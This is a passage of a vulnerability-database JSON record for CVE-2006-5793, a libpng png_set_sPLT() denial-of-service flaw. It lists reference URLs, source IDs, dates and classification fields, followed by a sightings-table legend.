"http://jvn.jp/cert/jvnta08-079a/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/tr/trta08-079a/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-5793" }, { "trust": 0.8, "url": "http://secunia.com/advisories/22900/" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/alerts/sa08-079a.html" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/techalerts/ta08-079a.html" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2006-5793" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:212" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:211" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:210" }, { "trust": 0.6, "url": "http://frontal2.mandriva.com/security/advisories?name=mdksa-2006:209" }, { "trust": 0.6, "url": "http://www.frsirt.com/english/advisories/2006/4568" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/489135/100/0/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/453484/100/100/threaded" }, { "trust": 0.6, "url": "http://www.securityfocus.com/archive/1/archive/1/451874/100/200/threaded" }, { "trust": 0.6, "url": "http://www.frsirt.com/english/advisories/2008/0924/references" }, { "trust": 0.4, "url": "http://www.mandriva.com/security/" }, { "trust": 0.4, "url": "http://www.mandriva.com/security/advisories" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3334" }, { "trust": 0.4, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3334" }, { "trust": 0.3, "url": "http://www.libpng.org/pub/png/libpng.html" }, { "trust": 0.3, "url": "http://rhn.redhat.com/errata/rhsa-2007-0356.html" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.dsc" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_powerpc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_i386.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_powerpc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel.orig.tar.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5ubuntu0.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_amd64.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18.orig.tar.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5.1ubuntu0.1.dsc" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_sparc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.0.18-1ubuntu3.1.dsc" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng_1.2.8rel-5ubuntu0.1.diff.gz" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_amd64.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5.1ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5.1ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng2-dev_1.0.18-1ubuntu3.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5.1ubuntu0.1_sparc.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_i386.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-0_1.2.8rel-5ubuntu0.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng3_1.2.8rel-5.1ubuntu0.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng2_1.0.18-1ubuntu3.1_all.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_powerpc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng12-dev_1.2.8rel-5ubuntu0.1_sparc.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-dev_1.0.18-1ubuntu3.1_amd64.deb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/universe/libp/libpng/libpng12-0-udeb_1.2.8rel-5ubuntu0.1_i386.udeb" }, { "trust": 0.1, "url": "http://security.ubuntu.com/ubuntu/pool/main/libp/libpng/libpng10-0_1.0.18-1ubuntu3.1_amd64.deb" }, { "trust": 0.1, "url": "http://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/32234/" }, { "trust": 0.1, "url": "http://secunia.com/binary_analysis/sample_analysis/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13693/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/15986/" }, { "trust": 0.1, "url": "http://jvn.jp/en/jp/jvn30732239/index.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13690/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13688/" }, { "trust": 0.1, "url": "http://www.fujitsu.com/global/support/software/security/products-f/interstage-200806e.html" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/15610/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13685/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13687/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13689/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13686/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/product/13692/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0599" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2002-1363" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0421" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0598" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2004-0597" }, { "trust": 0.1, "url": "http://secunia.com/" }, { "trust": 0.1, "url": "http://www.digicamsoft.com/bmp/bmp.html" }, { "trust": 0.1, "url": "http://www.coresecurity.com." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5266" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-2445" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5267" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5269" }, { "trust": 0.1, "url": "http://code.google.com/android/adc.html" }, { "trust": 0.1, "url": "http://enigmail.mozdev.org" }, { "trust": 0.1, "url": "http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/ar2008021101944.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0986" }, { "trust": 0.1, "url": "http://www.infoworld.com/article/08/02/27/09tc-google-android_1.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0985" }, { "trust": 0.1, "url": "http://www.w3.org/tr/png/" }, { "trust": 0.1, "url": "http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html" }, { "trust": 0.1, "url": "http://code.google.com/p/android/issues" }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs" }, { "trust": 0.1, "url": "http://lists.grok.org.uk/full-disclosure-charter.html" }, { "trust": 0.1, "url": "http://www.wiley.com/wileycda/wileytitle/productcd-047008023x.html" }, { "trust": 0.1, "url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc." }, { "trust": 0.1, "url": "http://www.openhandsetalliance.com/android_overview.html" }, { "trust": 0.1, "url": "http://www.w3.org/graphics/gif/spec-gif89a.txt" }, { "trust": 0.1, "url": "http://www.coresecurity.com/corelabs/." }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5268" }, { "trust": 0.1, "url": "http://code.google.com/p/android/downloads/list" } ], "sources": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "21078" }, { "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "db": "PACKETSTORM", "id": "52296" }, { "db": "PACKETSTORM", "id": "52280" }, { "db": "PACKETSTORM", "id": "52283" }, { "db": "PACKETSTORM", "id": "52284" }, { "db": "PACKETSTORM", "id": "70792" }, { "db": "PACKETSTORM", "id": "52286" }, { "db": "PACKETSTORM", "id": "64260" }, { "db": "PACKETSTORM", "id": "52285" }, { "db": "CNNVD", "id": "CNNVD-200611-295" }, { "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2006-11-14T00:00:00", "db": "BID", "id": "21078" }, { "date": "2007-06-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "date": "2006-11-19T01:47:03", "db": "PACKETSTORM", "id": "52296" }, { "date": "2006-11-18T01:00:18", "db": "PACKETSTORM", "id": "52280" }, { "date": "2006-11-18T01:41:02", "db": "PACKETSTORM", "id": "52283" }, { "date": "2006-11-18T01:43:05", "db": "PACKETSTORM", "id": "52284" }, { "date": "2008-10-10T23:03:15", "db": "PACKETSTORM", "id": "70792" }, { "date": "2006-11-18T01:44:10", "db": "PACKETSTORM", "id": "52286" }, { "date": "2008-03-04T22:33:55", "db": "PACKETSTORM", "id": "64260" }, { "date": "2006-11-18T01:43:39", "db": "PACKETSTORM", "id": "52285" }, { "date": "2006-11-17T00:00:00", "db": "CNNVD", "id": "CNNVD-200611-295" }, { "date": "2006-11-17T23:07:00", "db": "NVD", "id": "CVE-2006-5793" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2008-03-19T02:30:00", "db": "BID", "id": "21078" }, { "date": "2009-04-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000961" }, { "date": "2006-11-30T00:00:00", "db": "CNNVD", "id": "CNNVD-200611-295" }, { "date": "2018-10-17T21:45:05.390000", "db": "NVD", "id": "CVE-2006-5793" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "libpng of png_set_sPLT() Denial of service in function (DoS) Vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000961" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation", "sources": [ { "db": "CNNVD", "id": "CNNVD-200611-295" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.